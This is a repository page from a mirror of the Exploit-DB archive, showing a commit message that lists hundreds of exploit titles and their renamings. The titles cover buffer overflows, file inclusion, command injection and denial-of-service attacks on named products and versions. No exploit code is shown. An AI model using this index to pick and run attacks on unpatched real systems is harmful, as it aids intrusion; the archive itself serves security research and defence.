bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/python/remote/40170.rb
Offensive Security 70d97f91c1 DB: 2016-07-28 
2 new exploits

Multiple AntiVirus (zip file) Detection Bypass Exploit
Multiple AntiVirus - .zip Detection Bypass Exploit

RealPlayer 10 - (.smil File) Local Buffer Overflow Exploit
RealPlayer 10 - (.smil) Local Buffer Overflow Exploit

Veritas Backup Exec - Remote File Access Exploit (Windows)
Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)
ZENworks 6.5 Desktop/Server Management Remote Stack Overflow
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit
Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow
ZENworks 6.5 Desktop/Server Management - Remote Stack Overflow (Metasploit)
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit (Metasploit)
Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)

WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit
WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit (Metasploit)

Opera <= 8.02 - Remote Denial of Service Exploit
Opera <= 8.02 - Remote Denial of Service Exploit (1)
MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit
Google Search Appliance - proxystylesheet XSLT Java Code Execution
MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit (Metasploit)
Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)
Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit
Lyris ListManager - Read Message Attachment SQL Injection Exploit
Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit (Metasploit)
Lyris ListManager - Read Message Attachment SQL Injection Exploit (Metasploit)

Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux)
Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux) (Metasploit)

Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX)
Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX) (Metasploit)

Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit
Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit (Metasploit)
Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit
Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow
Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit (Metasploit)
Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow (Metasploit)

Microsoft Visual Studio 6.0 sp6 - (Malformed .dbp File) Buffer Overflow Exploit
Microsoft Visual Studio 6.0 sp6 - (.dbp) Buffer Overflow Exploit
Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit
Symantec Sygate Management Server - (login) SQL Injection Exploit
Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit
Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit (Metasploit)
Symantec Sygate Management Server - (login) SQL Injection Exploit (Metasploit)
Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit (Metasploit)

Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025)
Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)

Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)
Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) (Metasploit)
eIQnetworks License Manager Remote Buffer Overflow Exploit (1262)
eIQnetworks License Manager Remote Buffer Overflow Exploit (494)
eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit)

eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (2)
eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit) (2)

Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)
Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit)

Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)
Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (Metasploit) (2)

IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit
IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit (Metasploit)

Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040)
Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit)

Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit
Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit (Metasploit)

McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit
McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)

PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32)
PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32) (Metasploit)

Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept
Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept (Metasploit)

VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit (Metasploit)
VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit (Metasploit)

VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit
VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit

Windows Media Player 9/10 - (MID File) Denial of Service Exploit
Windows Media Player 9/10 - (.MID) Denial of Service Exploit

NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit
NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit (Metasploit)

Oreon <= 1.2.3 RC4 - (lang/index.php file) Remote Inclusion
Oreon <= 1.2.3 RC4 - (lang/index.php) Remote Inclusion

Magic CMS 4.2.747 - (mysave.php file) Remote File Include
Magic CMS 4.2.747 - (mysave.php) Remote File Include

WebLog (index.php file) Remote File Disclosure
WebLog (index.php) Remote File Disclosure

Pathos CMS 0.92-2 - (warn.php file) Remote File Inclusion
Pathos CMS 0.92-2 - (warn.php) Remote File Inclusion

Zomplog 3.8 - (force_download.php file) Remote File Disclosure
Zomplog 3.8 - (force_download.php) Remote File Disclosure

Winamp <= 5.3 - (WMV File) Remote Denial of Service Exploit
Winamp <= 5.3 - (.WMV) Remote Denial of Service Exploit

Opera 9.2 - (torrent File) Remote Denial of Service Exploit
Opera 9.2 - (.torrent) Remote Denial of Service Exploit

JulmaCMS 1.4 - (file.php file) Remote File Disclosure
JulmaCMS 1.4 - (file.php) Remote File Disclosure

PStruh-CZ 1.3/1.5 - (download.asp File) File Disclosure
PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure
Virtual DJ 5.0 - (m3u File) Local Buffer OverFlow Exploit
OTSTurntables 1.00 - (m3u File) Local Buffer Overflow Exploit
Virtual DJ 5.0 - (.m3u) Local Buffer OverFlow Exploit
OTSTurntables 1.00 - (.m3u) Local Buffer Overflow Exploit

AtomixMP3 2.3 - (pls File) Local Buffer OverFlow Exploit
AtomixMP3 2.3 - (.pls) Local Buffer OverFlow Exploit

helplink 0.1.0 - (show.php file) Remote File Inclusion
helplink 0.1.0 - (show.php) Remote File Inclusion

jetAudio 7.x - (m3u File) Local SEH Overwrite Exploit
jetAudio 7.x - (m3u) Local SEH Overwrite Exploit

FireConfig 0.5 - (dl.php file) Remote File Disclosure
FireConfig 0.5 - (dl.php) Remote File Disclosure

Sony CONNECT Player 4.x - (m3u File) Local Stack Overflow Exploit
Sony CONNECT Player 4.x - (.m3u) Local Stack Overflow Exploit

phpCMS 1.2.2 - (parser.php file) Remote File Disclosure
phpCMS 1.2.2 - (parser.php) Remote File Disclosure

ChartDirector 4.1 - (viewsource.php file) File Disclosure
ChartDirector 4.1 - (viewsource.php) File Disclosure

IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl)
IntelliTamper 2.07 - (.map) Local Arbitrary Code Execution Exploit (Perl)

Acoustica Mixcraft <= 4.2 Build 98 - (mx4 file) Local BoF Exploit
Acoustica Mixcraft <= 4.2 Build 98 - (mx4) Local BoF Exploit

Acoustica MP3 CD Burner 4.51 Build 147 - (asx file) Local BoF Exploit
Acoustica MP3 CD Burner 4.51 Build 147 - (.asx) Local BoF Exploit

Acoustica Beatcraft 1.02 Build 19 - (bcproj file) Local BoF Exploit
Acoustica Beatcraft 1.02 Build 19 - (.bcproj) Local BoF Exploit

Microsoft Windows Explorer - (.zip File) Denial of Service Exploit
Microsoft Windows Explorer - (.zip) Denial of Service Exploit

Kusaba <= 1.0.4 - Remote Code Execution Exploit
Kusaba <= 1.0.4 - Remote Code Execution Exploit (1)

Cain & Abel 4.9.23 - (rdp file) Buffer Overflow PoC
Cain & Abel 4.9.23 - (.rdp) Buffer Overflow PoC

Electronics Workbench (EWB File) Local Stack Overflow PoC
Electronics Workbench (.EWB) Local Stack Overflow PoC

Cain & Abel 4.9.23 - (rdp file) Buffer Overflow Exploit
Cain & Abel 4.9.23 - (.rdp) Buffer Overflow Exploit

autositephp 2.0.3 - (LFI/CSRF/edit file) Multiple Vulnerabilities
autositephp 2.0.3 - (LFI/CSRF/Edit file) Multiple Vulnerabilities

CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit
CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit

CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (Python)
CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit (Python)

SAWStudio 3.9i (prf File) Local Buffer Overflow PoC
SAWStudio 3.9i - (.prf) Local Buffer Overflow PoC

IntelliTamper 2.07/2.08 - (MAP File) Local SEH Overwrite Exploit
IntelliTamper 2.07/2.08 - (.MAP) Local SEH Overwrite Exploit

Hex Workshop 5.1.4 - (Color Mapping File) Local Buffer Overflow PoC
Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow PoC

Destiny Media Player 1.61 - (lst File) Local Buffer Overflow PoC
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow PoC
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2)
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (3)
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (2)
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (3)
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (4)
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (5)
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (4)
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (5)

VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit
VUPlayer 2.49 - (.pls) Universal Buffer Overflow Exploit

ExcelOCX ActiveX 3.2 - (Download File) Insecure Method Exploit
ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit
Zinf Audio Player 2.2.1 - (PLS File) Stack Overflow PoC
Zinf Audio Player 2.2.1 - (PLS File) Local Buffer Overflow Exploit (univ)
Zinf Audio Player 2.2.1 - (M3U FILE) Local Heap Overflow PoC
Zinf Audio Player 2.2.1 - (gqmpeg File) Buffer Overflow PoC
Zinf Audio Player 2.2.1 - (.pls) Stack Overflow PoC
Zinf Audio Player 2.2.1 - (.pls) Local Buffer Overflow Exploit (univ)
Zinf Audio Player 2.2.1 - (.M3U) Local Heap Overflow PoC
Zinf Audio Player 2.2.1 - (.gqmpeg) Buffer Overflow PoC

Thomson mp3PRO Player/Encoder (M3U File) Crash PoC
Thomson mp3PRO Player/Encoder - (.M3U) Crash PoC

Spider Player 2.3.9.5 - (asx File) off by one Crash Exploit
Spider Player 2.3.9.5 - (.asx) off by one Crash Exploit

Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC
Elecard AVC HD PLAYER - (.m3u/.xpl) Local Stack Overflow PoC

Nokia N95-8 - (.JPG File) Remote Crash PoC
Nokia N95-8 - (.JPG) Remote Crash PoC

Media Commands (m3u File) Local SEH Overwrite Exploit
Media Commands (.m3u) Local SEH Overwrite Exploit

Media Commands (m3u File) Universal SEH Overwrite Exploit
Media Commands (.m3u) Universal SEH Overwrite Exploit

MediaCoder 0.6.2.4275 - (m3u File) Universal Stack Overflow Exploit
MediaCoder 0.6.2.4275 - (.m3u) Universal Stack Overflow Exploit

VUPlayer <= 2.49 - (.cue) Universal Buffer Overflow Exploit
VUPlayer 2.49 - (.cue) Universal Buffer Overflow Exploit

Gretech GOM Encoder 1.0.0.11 - (Subtitle File) Buffer Overflow PoC
Gretech GOM Encoder 1.0.0.11 - (.Subtitle) Buffer Overflow PoC
Abee Chm Maker 1.9.5 - (CMP File) Stack Overflow Exploit
PowerCHM 5.7 - (hhp File) Stack Overflow poC
Abee Chm Maker 1.9.5 - (.CMP) Stack Overflow Exploit
PowerCHM 5.7 - (.hhp) Stack Overflow poC

Apollo 37zz (M3u File) Local Heap Overflow PoC
Apollo 37zz - (.m3u) Local Heap Overflow PoC

mpegable Player 2.12 - (YUV File) Local Stack Overflow PoC
mpegable Player 2.12 - (.YUV) Local Stack Overflow PoC

Rama CMS <= 0.9.8 - (download.php file) File Disclosure
Rama CMS <= 0.9.8 - (download.php) File Disclosure

compface <= 1.5.2 - (XBM File) Local Buffer Overflow PoC
compface <= 1.5.2 - (.XBM) Local Buffer Overflow PoC

MP3-Nator 2.0 - (plf File) Universal Buffer Overflow Exploit (SEH)
MP3-Nator 2.0 - (.plf) Universal Buffer Overflow Exploit (SEH)

PatPlayer 3.9 - (M3U File) Local Heap Overflow PoC
PatPlayer 3.9 - (.M3U) Local Heap Overflow PoC

QuickDev 4 - (download.php file) File Disclosure
QuickDev 4 - (download.php) File Disclosure

FoxPlayer 1.1.0 - (m3u File) Local Buffer Overflow PoC
FoxPlayer 1.1.0 - (.m3u) Local Buffer Overflow PoC

Microsoft Windows 2003 - (EOT File) BSOD Crash Exploit
Microsoft Windows 2003 - (.EOT) BSOD Crash Exploit

VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit
VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit

Audio Lib Player (m3u File) Buffer Overflow Exploit (SEH)
Audio Lib Player (.m3u) Buffer Overflow Exploit (SEH)

MP3 Collector 2.3 - (m3u File) Local Crash PoC
MP3 Collector 2.3 - (.m3u) Local Crash PoC

BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC
BigAnt Server 2.50 SP1 - (.ZIP) Local Buffer Overflow PoC

BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)
BigAnt Server <= 2.50 SP6 - (.ZIP) Local Buffer Overflow PoC (2)

XM Easy Personal FTP Server <= 5.8.0 DoS
XM Easy Personal FTP Server <= 5.8.0 DoS (Metasploit)

Symantec ConsoleUtilities ActiveX Buffer Overflow
Symantec ConsoleUtilities ActiveX Buffer Overflow (Metasploit)

Nagios3 statuswml.cgi Command Injection
Nagios3 statuswml.cgi Command Injection (Metasploit)

httpdx 1.4 - h_handlepeer BoF
httpdx 1.4 - h_handlepeer BoF (Metasploit)

Mambo 4.6.4 - Cache Lite Output Remote File Inclusion
Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)
BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion
AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection
Cacti 0.8.6-d graph_view.php Command Injection
AWStats 6.2-6.1 - configdir Command Injection
ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution
SpamAssassin spamd <= 3.1.3 - Command Injection
DistCC Daemon - Command Execution
ContentKeeper Web Appliance < 125.10 Command Execution
Solaris in.telnetd TTYPROMPT - Buffer Overflow
Solaris 10 / 11 Telnet - Remote Authentication Bypass
Solaris sadmind adm_build_path - Buffer Overflow
Solaris <= 8.0 - LPD Command Execution
BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)
AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)
Cacti 0.8.6-d graph_view.php Command Injection (Metasploit)
AWStats 6.2-6.1 - configdir Command Injection (Metasploit)
ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution (Metasploit)
SpamAssassin spamd <= 3.1.3 - Command Injection (Metasploit)
DistCC Daemon - Command Execution (Metasploit)
ContentKeeper Web Appliance < 125.10 Command Execution (Metasploit)
Solaris in.telnetd TTYPROMPT - Buffer Overflow (Metasploit)
Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)
Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)
Solaris <= 8.0 - LPD Command Execution (Metasploit)
Solaris 8 dtspcd - Heap Overflow
Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X)
Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)
Solaris 8 dtspcd - Heap Overflow (Metasploit)
Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X) (Metasploit)
Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X) (Metasploit)
mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X)
WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)
Mail.App 10.5.0 - Image Attachment Command Execution (OS X)
Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X)
AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X)
Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow
mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X) (Metasploit)
WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X) (Metasploit)
Mail.App 10.5.0 - Image Attachment Command Execution (OS X) (Metasploit)
Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X) (Metasploit)
AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X) (Metasploit)
Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)
Wyse Rapport Hagent Fake Hserver - Command Execution
Subversion 1.0.2 - Date Overflow
Samba 2.2.x - nttrans Overflow
RealServer 7-9 Describe Buffer Overflow
PHP < 4.5.0 - unserialize Overflow
ntpd 4.0.99j-k readvar - Buffer Overflow
Veritas NetBackup - Remote Command Execution
HP OpenView OmniBack II A.03.50 - Command Executino
Apple Quicktime for Java 7 - Memory Access
Opera 9.50 / 9.61 historysearch - Command Execution
Opera <= 9.10 Configuration Overwrite
Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution
Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution
Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit
Firefox 3.5 - escape Memory Corruption Exploit
Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow
Squid 2.5.x / 3.x - NTLM Buffer Overflow
Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow
MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow
Borland InterBase 2007 - PWD_db_aliased Buffer Overflow
Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)
Subversion 1.0.2 - Date Overflow (Metasploit)
Samba 2.2.x - nttrans Overflow (Metasploit)
RealServer 7-9 Describe Buffer Overflow (Metasploit)
PHP < 4.5.0 - unserialize Overflow (Metasploit)
ntpd 4.0.99j-k readvar - Buffer Overflow (Metasploit)
Veritas NetBackup - Remote Command Execution (Metasploit)
HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)
Apple Quicktime for Java 7 - Memory Access (Metasploit)
Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit)
Opera <= 9.10 Configuration Overwrite (Metasploit)
Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)
Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)
Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit (Metasploit)
Firefox 3.5 - escape Memory Corruption Exploit (Metasploit)
Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)
Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)
Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)
MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow (Metasploit)
Borland InterBase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)

HP Release Control Authenticated XXE
HP Release Control Authenticated XXE (Metasploit)
Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow
Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow
Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow
Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)
Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)
Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow
Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow
University of Washington - imap LSUB Buffer Overflow
Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit
PeerCast <= 0.1216
Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow
Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)
University of Washington - imap LSUB Buffer Overflow (Metasploit)
Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit (Metasploit)
PeerCast <= 0.1216 (Metasploit)
Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow (Metasploit)
Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection
Unreal Tournament 2004 - 'Secure' Overflow
Irix LPD tagprinter - Command Execution
HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution
Xtacacsd <= 4.1.2 - report Buffer Overflow
System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)
Mercantec SoftCart 4.00b - CGI Overflow
Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection (Metasploit)
Unreal Tournament 2004 - 'Secure' Overflow (Metasploit)
Irix LPD tagprinter - Command Execution (Metasploit)
HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit)
Xtacacsd <= 4.1.2 - report Buffer Overflow (Metasploit)
System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based) (Metasploit)
Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)

Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution
Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit)
M3U To ASX-WPL 1.1 - (m3u Playlist file) Buffer Overflow Exploit
HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit
Audacity 1.2.6 - (gro File) Buffer Overflow Exploit
M3U To ASX-WPL 1.1 - (.m3u) Buffer Overflow Exploit
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit
Audacity 1.2.6 - (.gro) Buffer Overflow Exploit

HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (Metasploit)
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (Metasploit)

Millenium MP3 Studio 2.0 - (PLS File) Universal Stack Overflow (Metasploit)
Millenium MP3 Studio 2.0 - (.pls) Universal Stack Overflow (Metasploit)

Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (1)
Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (Metasploit) (1)

Audiotran 1.4.1 - (PLS File) Stack Overflow (Metasploit)
Audiotran 1.4.1 - (.pls) Stack Overflow (Metasploit)

OpenOffice - (.slk File) Parsing Null Pointer
OpenOffice - (.slk) Parsing Null Pointer

MediaCoder - (.lst file) Local Buffer Overflow Exploit
MediaCoder - (.lst) Local Buffer Overflow Exploit

VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)
VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)

ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS DEP and ASLR Bypass)
ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS DEP and ASLR Bypass) (Metasploit)

Mediacoder 0.7.3.4682 - (.m3u File) Universal Buffer Overflow Exploit
Mediacoder 0.7.3.4682 - (.m3u) Universal Buffer Overflow Exploit

Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass
Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)

Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit
Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit (Metasploit)

VUPlayer - M3U Buffer Overflow
VUPlayer - (.m3u) Buffer Overflow (Metasploit)

Audiotran 1.4.1 - (PLS File) Stack Buffer Overflow
Audiotran 1.4.1 - (.pls) Stack Buffer Overflow

HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (1)
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (1)

Millenium MP3 Studio 2.0 - (PLS File) Stack Buffer Overflow
Millenium MP3 Studio 2.0 - (.pls) Stack Buffer Overflow

VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
VariCAD 2010-2.05 EN - (.DWB) Stack Buffer Overflow

HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (2)
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (2)

ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow
ProShow Gold 4.0.2549 - (.PSH) Stack Buffer Overflow

VUPlayer - CUE Buffer Overflow
VUPlayer - (.cue) Buffer Overflow (Metasploit)

AstonSoft DeepBurner (DBR File) Path Buffer Overflow
AstonSoft DeepBurner - (.DBR) Path Buffer Overflow

HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (3)
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (3)

Zinf Audio Player 2.2.1 - (PLS File) Stack Buffer Overflow
Zinf Audio Player 2.2.1 - (.pls) Stack Buffer Overflow

MikeyZip 1.1 - (.zip File) Buffer Overflow
MikeyZip 1.1 - (.zip) Buffer Overflow

Windows - DNS Reverse Download and Exec Shellcode
Windows - DNS Reverse Download and Exec Shellcode (Metasploit)

Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter)
Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter) (Metasploit)

Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit
Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit (Metasploit)

If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (2)
If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit  (Metasploit) (2)

Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053)
Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053) (Metasploit)

MicroP 0.1.1.1600 - (MPPL File) Stack Buffer Overflow
MicroP 0.1.1.1600 - (.MPPL) Stack Buffer Overflow

Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass)
Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) (Metasploit)
HP JetDirect PJL Interface Universal Path Traversal
HP JetDirect PJL Query Execution
HP JetDirect PJL Interface Universal Path Traversal (Metasploit)
HP JetDirect PJL Query Execution (Metasploit)

Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution
Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution (Metasploit)

LifeSize Room - Command Injection
LifeSize Room - Command Injection (Metasploit)

Opera 10/11 - (bad nesting with frameset tag) Memory Corruption
Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)

Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day)
Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day) (Metasploit)

Cytel Studio 9.0 - (CY3 File) Stack Buffer Overflow
Cytel Studio 9.0 - (.CY3) Stack Buffer Overflow

NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
NJStar Communicator 3.00 MiniSMTP Server Remote Exploit (Metasploit)

KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass)
KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass) (Metasploit)

AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST)
AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit)

QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS
QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS (Metasploit)

Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow
Free MP3 CD Ripper 1.1 - (.WAV) Stack Buffer Overflow

CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u)
CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u) (Metasploit)
AVID Media Composer Phonetic Indexer Remote Stack BoF
